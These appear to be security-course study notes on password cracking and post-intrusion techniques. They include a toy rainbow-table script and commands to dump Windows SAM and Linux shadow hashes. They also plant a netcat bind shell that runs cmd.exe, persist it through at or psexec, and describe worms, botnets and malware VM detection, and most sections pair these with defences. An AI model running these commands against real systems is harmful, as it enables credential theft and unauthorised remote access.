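```python
import hashlib
import os

# Constructed toy keyspace: 4-digit PINs, so a complete table fits in memory and runs in seconds.
KEYSPACE = [f"{i:04d}" for i in range(10000)]
CHAIN_LEN = 50
N_CHAINS = 400


def pw_hash(password, salt=b""):
    """sha256 stands in for the unsalted NTLM (MD4) hash the notes discuss; salt is prepended."""
    return hashlib.sha256(salt + password.encode()).digest()


def reduce_to_pw(digest, column):
    """Reduction function: map a digest back into the keyspace, differently for each column."""
    return KEYSPACE[(int.from_bytes(digest[:8], "big") + column) % len(KEYSPACE)]


def build_table(salt=b""):
    """Store only (end point -> start point) per chain; the middle is recomputed on lookup."""
    table = {}
    for c in range(N_CHAINS):
        start = KEYSPACE[(c * 7919) % len(KEYSPACE)]   # spread start points over the keyspace
        pw = start
        for column in range(CHAIN_LEN):
            pw = reduce_to_pw(pw_hash(pw, salt), column)
        table.setdefault(pw, start)                      # keep the first chain when two merge
    return table


def lookup(table, target, salt=b""):
    """Return the password whose hash is target, or None if no chain covers it."""
    for column in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_to_pw(target, column)                # assume target sits at this column
        for later in range(column + 1, CHAIN_LEN):
            pw = reduce_to_pw(pw_hash(pw, salt), later)
        start = table.get(pw)
        if start is None:
            continue
        cand = start                                     # regenerate the chain to find the preimage
        for again in range(CHAIN_LEN):
            if pw_hash(cand, salt) == target:
                return cand
            cand = reduce_to_pw(pw_hash(cand, salt), again)
    return None


def coverage(table, sample):
    """Fraction of sample passwords the table recovers (chains merge, so it stays below 1)."""
    hits = sum(lookup(table, pw_hash(pw)) == pw for pw in sample)
    return hits / len(sample)


if __name__ == "__main__":
    unsalted = build_table()
    print("unsalted lookup:", lookup(unsalted, pw_hash("0000")))
    salt = os.urandom(8)                                 # the 64-bit salt the notes mention
    print("salted hash against the same table:", lookup(unsalted, pw_hash("0000", salt)))
    print("coverage of the first 200 PINs:", coverage(unsalted, KEYSPACE[:200]))
```

With a per-user salt the attacker needs one table per salt value, which is why a 64-bit salt turns a one-time precomputation into per-account work.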
Samdump2
To retrieve these hashes from a Windows machine, boot from Linux, mount the C:\ drive and dump the
SAM database.
[root@~]# samdump2 /mnt/CPrimary/Windows/system32/config/SYSTEM /mnt/CPrimary/Windows/system32/config/SAM > samdb.txt
NOTE: SYSTEM should be dumped prior to SAM, since if syskey is enabled the SAM database is encrypted
and the key is stored in the SYSTEM hive.
John the Ripper
A superb professional password cracking tool.
On Linux,
Retrieving hashes
/etc/passwd
In some Linux distributions, the hashes are stored in /etc/shadow (or /etc/secure).
# ./unshadow <passwd file> <shadow file> > output.txt
To grab a copy of a shadow password file, an attacker must find a root-level exploit, such as a
buffer overflow of a program that runs as root or a related technique, to gain root access. After
achieving root-level access, the attacker makes a copy of the shadow password file to crack.
Defenses:
- Strong password policy
  o Use alphanumeric characters, mixed case, numbers
  o Password expiry after 30, 60 or 90 days
  o Use password filtering software on the AD server during account creation and
    password modification
    - Password Guardian, a commercial tool: www.georgiasoftworks.com
    - Strongpass, a free tool: http://ntsecurity.nu/toolbox
- User awareness
- Where possible, use authentication tools other than passwords
  o Use RSA tokens, biometric access
- Protect hashes
  o On Linux, activate password shadowing, i.e., use /etc/shadow, which can be accessed
    only by root
  o On Windows, disable LM authentication:
    define HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
  o Delete %systemroot%\repair\sam._
Exercise
1) Create various accounts
2) Combine the passwd copy and shadow copy and retrieve the hashes
3) Look at John the Ripper's password.lst
4) Delete the accounts
5) Shred the files, which overwrites them with 0s and 1s so that they are removed from the hard
   disk blocks.
----------------- break ----------------------
Shell Access On Windows
Scenario: the attacker has an account created on the victim and uses a remote connection to open C$
of the victim's machine.
Now the attacker copies Netcat onto the victim's machine.
Now the attacker runs Z:\>nc -l -p 1545 -e cmd.exe [Z: on the attacker machine is C:\ on the victim's machine]
Result: the attacker created a Netcat listener on himself :P LOL.....
1. Connect to the remote machine with an administrative session.
2. Copy Netcat and a batch file that runs a listening Netcat onto the target machine.
3. Configure the Task Scheduler to run the batch file:
at \\computername time /interactive | /every:date,... /next:date,... command
at \\computername id /delete | /delete/yes
This will run netcat.bat every day at 4:02 PM on the victim machine with SYSTEM privileges.
Now Netcat is listening on the victim machine.
Alternately,
3. psexec from Sysinternals is used to run executables on remote machines:
Z:\>psexec \\victimmachine -c netcat.bat [copy the file]
Z:\>psexec \\victimmachine netcat.bat [run the batch file]
Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys:
psexec -i -d -s c:\windows\regedit.exe
PSEXEC did not work out because BlackIce blocked it on the victim machine.
Defences
- Do not let the attacker get admin access to the machine
- Harden the ports
- net session shows what sessions are present on the machine
- net start shows what services are running
- Disable scheduling if not required.
Containment
- Check the scheduled tasks and delete them.
- Kill the services/processes that are listening
Eradication
- Identify the process and remove it
- Check for rootkits; if present, rebuild the machine
Recovery
Harden the machine based on the preparation phase
WORM
A self-replicating code that spreads across the network.
Each instance is called a segment.
They use vulnerabilities in applications and operating systems to spread.
Eg: the Blaster worm uses the buffer overflow vulnerability in MS-RPC DCOM.
From 2005, they started carrying bots, which gave rise to botnets.
Multi-exploit: Nimda worms have 12 to 15 exploits (multiple ways) to break into a machine.
Polymorphic worms: the worm recodes itself when it infects another machine to evade detection.
1. Encrypt the original code of the worm with a random key (a simple XOR)
2. Generate a short decryptor for the key (PD)
3. This operation is done by a polymorphic engine (PE) which is included with the worm's code.
Open-source toolkits to mutate exploits: ADMMutate, CLET, and JempiScodes.
They can plant Trojans and backdoors, which gave rise to botnets.
Metamorphic worms: the worm changes its functionality. It might download new code from the C&C.
Defences
- Buffer overflow protection
- A process for rapid patching
- Use HIDS and NIDS. Also contact network management personnel to identify chokepoints at
  various places inside the organization where you can place filters.
- Encrypt your desktops and laptops with software like PointSec, so that even if a bot gets in, it
  will not play with the data.
Propagation: e-mails, browser exploits, drive-by downloads
Mechanisms for botnet control:
- IRC from a command & control server: the most popular mechanism
- Some bots periodically log in to some user on MySpace, or some blogs, to see the commands
  stored there.
- Distributed P2P communication channels. Commands are injected on one bot; the remaining bots
  check for updates with their neighbor bots, take the command and spread it thereafter. Now the
  problem of a single C&C is resolved. The botnet becomes self-aware.
Botnets Detecting Virtual Machines
Since virtual machines are used to analyse malware, the malware detects that it is running in a
virtual machine and shuts off its malicious activity.
- Check memory artifacts: file system, registry, and running processes of the machine
- Redpill:
  o Executes the SIDT instruction, which saves the address of the Interrupt Descriptor Table
  o If it is running on a real machine, the address is in lower memory (< 0xd0) near the
    operating system kernel.
  o If it is running in a VM, the address value is higher
- Scoopy Doo: SIDT, SGDT, SLDT
  SIDT: Store Interrupt Descriptor Table
  SGDT: Store Global Descriptor Table
  SLDT: Store Local Descriptor Table
  o If these values are consistent with virtualization, you are in virtualization
- Look for virtualized hardware
  o Look at MAC addresses, device drivers, interfaces
- VMDetect: it runs instructions that only virtual machines execute, which result in an invalid
  instruction fault when run on a real machine.
- VMware backdoor I/O port
  Look for changes in processor behaviour associated with the communications channel. Clock
  synchronization, copy+paste, drag and drop etc. happen over this COM channel.
  The following operation invokes backdoor functions:
  /* in Intel syntax (MASM and most Windows based assemblers) */
  MOV EAX, 564D5868h                    /* magic number */
  MOV EBX, command-specific-parameter
  MOV CX,  backdoor-command-number
  MOV DX,  5658h                        /* VMware I/O Port */
  IN  EAX, DX        (or OUT DX, EAX)

  /* in AT&T syntax (gnu as and many unix based assemblers) */
  movl $0x564D5868, %eax;               /* magic number */
  movl command-specific-parameter, %ebx;
  movw backdoor-command-number, %cx;
  movw $0x5658, %dx;                    /* VMware I/O port */
  inl  %dx, %eax;    (or outl %eax, %dx)
In appearance it is just a straightforward I/O access operation.
Depending on the command number that was passed in EBX, different operations are carried out.
Source code: http://chitchat.at.infoseek.co.jp/vmware/backdoor.html